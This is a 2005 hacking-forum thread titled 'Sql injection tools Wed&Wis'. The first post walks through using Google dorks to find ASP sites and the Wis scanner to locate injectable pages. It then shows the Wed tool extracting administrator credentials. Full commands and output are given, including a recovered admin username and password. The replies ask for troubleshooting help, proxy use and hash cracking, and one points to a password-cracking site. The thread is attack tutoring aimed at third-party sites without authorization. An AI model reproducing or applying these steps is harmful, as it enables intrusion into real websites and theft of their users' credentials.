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Sql injection tools Wed&Wis
PostPosted: Thu Jan 13, 2005 4:02 pm Reply with quote
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Joined: Nov 21, 2004
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Location: Estonia

I found 2 tools to automate the sql injection process. I tested them and got some users/passwds Smile My tests also showed that it missed some sql injections Sad
Here's how to use them:
First i searched with google some asp sites like this "allinurl:/login.asp". Next i used Wis (Web Injection Scanner - searches web for sql injection) and if it found hole then i started Wed (Web Entry Detector) to exploit the injection. Tools can be downloaded from here:
It goes like this:


C:\>wis http://www.someaspsite.com/

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited
Patient, Please....

(001 + 000) Checking: /shownews.asp?newsid=204
SQL Injection Found: /shownews.asp?newsid=204

Injection Page Final Result:


To detect access pages, put a "/A" to the end of command:


C:\>wis http://www.someaspsite.com/ /A

Web Injection Scanner (Protype 0.4)
by netXeyes, 2004.05.08 http://www.netXeyes.com security@vip.sina.com

Scanning http://www.someaspsite.com/, Page: Unlimited, Detect Access Page
Patient, Please....

(004 + 005) Access Page: /www.asp
(004 + 006) Access Page: /wwwstats.asp
(004 + 006) Access Page: /wwwlog.asp
(004 + 006) Access Page: /wstats.asp
(004 + 006) Access Page: /work.asp
(005 + 007) Access Page: /webstats.asp
(000 + 016) Access Page: /gansu2/tjhg.files/admin_index.asp
(000 + 015) Access Page: /gansu2/tjhg.files/admin.asp
(000 + 012) Access Page: /gansu2/gs.files/admin_index.asp
(000 + 011) Access Page: /gansu2/gs.files/index_admin.asp
(000 + 010) Access Page: /gansu2/tjhg.files/admin_del.asp
(000 + 009) Access Page: /gansu2/ddddd.files/manage.asp
(000 + 003) Access Page: /gansu2/ddddd.files/index_admin.asp

Access Page Final Result:
/gansu2/login.asp (200 OK)

Scan Finished


When you successfully find Sql Injection with Wis then next step is to use Wed and the vulnerable url:


C:\>WED.exe http://www.someaspsite.com/shownews.asp?newsid=1544

Web Entry Detector, Ver 1.0 by netXeyes, 2004/08/26
http://www.netXeyes.com, security@vip.sina.com

#### Phrase 0: Check Enviroment ####
Get Row 1, Set Sensitive 250, Max Threads is 30
File C:\TableName.dic Opened
File C:\UserField.dic Opened
File C:\PassField.dic Opened

#### Phrase 1: Process Argv ####

#### Phrase 2: Detect SQL Injection ####
SQL Injection Detected.

#### Phrase 3: Get Cookies ####
Tag: 2017

#### Phrase 4: Starting Get Table Name ####
Tag: 45
Got Table Name is "users"

#### Phrase 5: Starting Get Name Field ####
Tag: 45
Got Name Field is "name"

#### Phrase 6: Starting Get Length of Field "name" ####
Tag: 24
Got Length of Field "name" is: 13

#### Phrase 7: Starting Get Password Field ####
Tag: 45
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 9

#### Phrase 9: Starting Brute Field "name" and "pwd" (Access Mode) ####

name is: administrator
pwd is: admin@bvn


Happy Injecting Razz
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PostPosted: Thu Jan 13, 2005 10:28 pm Reply with quote
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Joined: May 18, 2004
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Location: Serbia

nice found


We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
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PostPosted: Fri Jan 14, 2005 7:08 pm Reply with quote
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Joined: Dec 02, 2004
Posts: 26

very good toolz thanks qr4t Very Happy
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This Tools is China Hacker rongxiao Public
PostPosted: Sat Jan 15, 2005 3:42 pm Reply with quote
Joined: Jan 15, 2005
Posts: 2


is very good
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PostPosted: Sat Jan 15, 2005 5:29 pm Reply with quote
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{ [ NCT ] }
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PostPosted: Tue Jan 18, 2005 5:35 am Reply with quote
Joined: Jan 18, 2005
Posts: 1

Hi, the first of all, sorry for my very very very bad english Embarassed
Congratulations for the wis & wed programs. Very Happy
I have a problem. The first step with the wis, it's ok!, an example i got this:
Page Found: /admin/login.asp (401 AuthReq)
Page Found: /admin/default.asp (401 AuthReq)
Page Found: /admin/index.asp (401 AuthReq)
Page Found: /admin/manage.asp (401 AuthReq)

Access Page Final Result:
/admin/manage.asp (401 AuthReq)
/admin/index.asp (401 AuthReq)
/admin/default.asp (401 AuthReq)
/admin/login.asp (401 AuthReq)

Now, I not that to do with these results, in step 2 with the wed program Crying or Very sad
Anyone can help me please?
Sorry one more time for my bad english Embarassed
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What about using proxy with the wis usage ?
PostPosted: Tue Jan 18, 2005 3:34 pm Reply with quote
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

is there a -p or anything in the usage to use proxy .. ?
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PostPosted: Tue Jan 18, 2005 6:09 pm Reply with quote
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus

HEllo again ..i have run this expl from another pc and i have managed to get to the point where it is using brute force

#### Phrase 7: Starting Get Password Field ####
Tag: 332
Got Password Field is "pwd"

#### Phrase 8: Starting Get Length of Field "pwd" ####
Tag: 24
Got Length of Field "pwd" is: 5

#### Phrase 9: Starting Brute Field "administrators" and "pwd" (Access Mode) ###
Brute Force "administrators": ktu' "pwd": VB?<Y "!ln=Zry(),.v&kHJaEIKb(R$),Q<S>
C:\Documents and Settings\xxxx\Desktop\wed>

and while it is working the program crashes...any ideas y?
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PostPosted: Fri Mar 18, 2005 9:53 pm Reply with quote
Joined: Mar 18, 2005
Posts: 1

#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I cant log in with this info!
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PostPosted: Tue Mar 29, 2005 8:46 am Reply with quote
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it come from china!
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PostPosted: Wed Mar 30, 2005 10:32 am Reply with quote
Joined: Feb 12, 2005
Posts: 3

whay i got this error admin.txt not fond ı have admin.txt in same directory can some one help me.. Question
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PostPosted: Tue Jul 05, 2005 10:00 pm Reply with quote
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Joined: Jul 05, 2005
Posts: 18

wis seemed don't work for me , but wed , no problem .

understand.. when I launch wis , with or without param , the program stop , without checking anything.. no error message , nothing , just stop .
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hashed password
PostPosted: Thu Jul 07, 2005 4:31 pm Reply with quote
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Posts: 6

kunfuzed wrote:
#### Phrase 9: Starting Brute Field "user_name" and "admin_password" (Access Mod
e) ####
Brute Force "user_name": rgacabbheeaadbgcfj "admin_password": mnbbiocfddml k

user_name is: rgacabbheeaadbgcdhcfa
admin_password is: mnbbiocfddmcgfk

I have gotten the name and password but is it hashed? I cant log in with this info!

Well if the password is hashed with md5 algorthm try using this:
If it is sha1 or not salted md5 try http://passcracking.com/
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PostPosted: Thu Jul 07, 2005 6:10 pm Reply with quote
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Posts: 22

downloaded it, how do i use it?
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PostPosted: Thu Jul 14, 2005 12:37 pm Reply with quote
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Posts: 6

md5crack xxx
xxx - type your hash here
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Sql injection tools Wed&Wis
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